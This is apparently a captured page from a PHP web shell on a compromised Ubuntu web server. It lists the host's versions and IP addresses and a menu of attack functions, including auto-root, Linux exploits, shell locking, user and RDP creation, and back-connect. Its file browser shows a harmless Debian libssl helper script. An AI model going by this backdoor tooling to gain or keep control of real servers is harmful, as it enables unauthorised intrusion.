Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl-openssl-defaults /
[ HOME SHELL ]
Name
Size
Permission
Action
get-libssl-abi
752
B
-rwxr-xr-x
perl-openssl.make
172
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get-libssl-abi
#!/bin/sh # read SONAME version from /usr/lib/<triplet>/libssl.so DEB_HOST_GNU_TYPE=${DEB_HOST_GNU_TYPE:-$(dpkg-architecture -qDEB_HOST_GNU_TYPE)} DEB_HOST_MULTIARCH=${DEB_HOST_MULTIARCH:-$(dpkg-architecture -qDEB_HOST_MULTIARCH)} SOFILE=/usr/lib/${DEB_HOST_MULTIARCH}/libssl.so OBJDUMP=${DEB_HOST_GNU_TYPE}-objdump if [ ! -r "$SOFILE" ]; then echo "Can't read '$SOFILE', aborting" 1>&2 exit 1 fi if ! which "$OBJDUMP" >/dev/null 2>&1; then echo "Can't run '$OBJDUMP', aborting" 1>&2 exit 1 fi SONAME=$("$OBJDUMP" -p "$SOFILE" | perl -ne '/SONAME\s+libssl\.so\.(.+)/ and print $1') if [ ! -n "$SONAME" ]; then echo "Could not parse SONAME from the output of '$OBJDUMP' '$SOFILE', aborting" 1>&2 exit 2 fi echo "$SONAME"
Close